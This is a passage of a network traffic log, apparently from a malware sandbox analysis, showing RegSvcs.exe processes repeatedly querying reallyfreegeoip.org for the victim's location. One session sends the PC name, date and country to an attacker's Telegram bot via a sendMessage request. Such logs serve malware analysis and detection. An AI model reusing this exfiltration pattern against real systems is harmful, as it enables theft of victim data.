2024-10-29 09:32:18 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49727	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:19 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:19 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:19 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1849 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WiDCSY9fnoR0k6PetccNVSFma57rgyY7q8SgsigK5khfG4p2HcG747YPp2uDxiVwqUH7RXOQQxnAzMJ2jYLlaOPiJLtwt7ksUYPnxMUh31Xgr4XEBAFs502fkyfX%2F5dA3SxCbmg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2285d5a8c4624-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1647326&cwnd=251&unsent_bytes=0&cid=b701a807fa7762d6&ts=150&x=0"
2024-10-29 09:32:19 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49728	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:19 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:20 UTC	888	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:19 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1849 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kL0WNXLRqgaDGMd7Pc6X3MhBJRZ6d3HYHSq2dQBGsFHvZY9IK2Ayr82YKHeceoMXRMzUScHTWpXf8%2BZ%2BpljUQU%2B0bBgfIWnECAEKKq2q2a%2BjdQRhUI4TVjM5JiqVQWOCiI5fws%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da22860cc73477e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2227692&cwnd=250&unsent_bytes=0&cid=f3a3b4011b9d33fc&ts=148&x=0"
2024-10-29 09:32:20 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49731	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:21 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:32:21 UTC	886	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:21 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1851 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OEFs3cy4j2awYVMJLwqCYm4PemOS9upccar8j15Zk%2BiP04QbuwiH1BDAxojsC5AzAs3HlALW5LsqSEQ3ZSAssPv4ImS0eGiibStq7%2FMC%2BQ59PRsJaZ3iieLVMiur8AwRU4w1qr%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da22867dd916bd2-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1550&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1794299&cwnd=251&unsent_bytes=0&cid=38f2955db1dc9e2f&ts=148&x=0"
2024-10-29 09:32:21 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49732	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:21 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:21 UTC	884	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:21 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1851 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3AFxY7rLDnN1RYknDG1O471HyqUbOn8TwKDgwTJObXzTgFSMl%2F7fBnwD%2BO2xeHyVCiElH22b3ObtfC7qbGbYGkHXW7xi9ym96PFThgOcV388OCrapAMzVSIPbmW%2BFLD2x0mFGhum"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2286b2bb92ca5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2528&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1254766&cwnd=251&unsent_bytes=0&cid=958318a3a5c2e4d4&ts=152&x=0"
2024-10-29 09:32:21 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49739	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:23 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:23 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:23 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1853 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ibHD5PHB%2Fje3Wa6C27pgIVzLEZ4R5uIrUHyCPVySyPsPXWoP9C8GbpUX5ox9dDNMHNOOAYv3ef6P7NEdey3WlGEqYojXaqoBFYj1Kc712joL9gEu4oWyTYbB8EYeIbjL4P7b6kQN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da228790b8f3ac1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1121&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2285714&cwnd=247&unsent_bytes=0&cid=311f472df52fcb8d&ts=728&x=0"
2024-10-29 09:32:23 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49737	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:23 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:23 UTC	887	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:23 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1853 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1acTCVXGM1BScylwtO1YdrTbMAoV1egZP5ctguJ9w7EDWzP%2FrEfauG2%2FU%2FMFA9M7izbM4mJPk2OswloeVl75qnbhkYVnn%2Ftwg82k1xYzWQM6Wi5tOqZ2tNaaGXISN5QNzn0bLzO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da228790bb245ff-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2583407&cwnd=251&unsent_bytes=0&cid=5121ea291c3eed01&ts=1261&x=0"
2024-10-29 09:32:23 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49741	149.154.167.220	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:24 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2020:43:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-29 09:32:25 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 29 Oct 2024 09:32:24 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-29 09:32:25 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49743	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:25 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:25 UTC	890	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:25 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1855 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5HJI7FSmXkFbxRPjwSWuIdjP97%2FXUeT6d50gpeAr86sA4peytAQoFF%2F4ammDwWTLV8ehyjE%2FA6NgqVn4KqGEglhTsjjTOKAWvyRWo%2BJu%2BBE7nCUKbWkJY3CEtTvft07DhayY%2Fhtx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2288399156bda-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2154&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1408560&cwnd=239&unsent_bytes=0&cid=26d99bf2cc7a8240&ts=159&x=0"
2024-10-29 09:32:25 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49745	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:27 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:32:27 UTC	888	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:27 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1857 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kDRebkVKqo4FNOE%2Bf4W4aAL0l%2FyHyXpMtQyQcbAURDhJtITBVNIVAQUuZX5MNPQsMzKCY2a6nZfGSBuGRu%2FxDt13S%2FnIClDxg8Iw0SUw73qTSyPo5MZfZ%2FZZ7bvw0cHKZOb7e6rp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2288edecb475b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2518260&cwnd=251&unsent_bytes=0&cid=22d695c937297942&ts=151&x=0"
2024-10-29 09:32:27 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	51299	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:28 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:29 UTC	886	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:29 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1859 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1eb%2F1qsViFNaf5%2FvnETibVCV5bGryAusHxNfYQ68GM88f7vO9BIuCtoA8xxt%2BbruDPKZaNbT3oNGz4PB090tXyZgchbgc4QSJpQ7aOCU4RqKahqvvwuLGbF2FOu8haUdJa3oaZg%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da22899581e4696-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1060&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2637522&cwnd=251&unsent_bytes=0&cid=4f3bd0da944396c3&ts=157&x=0"
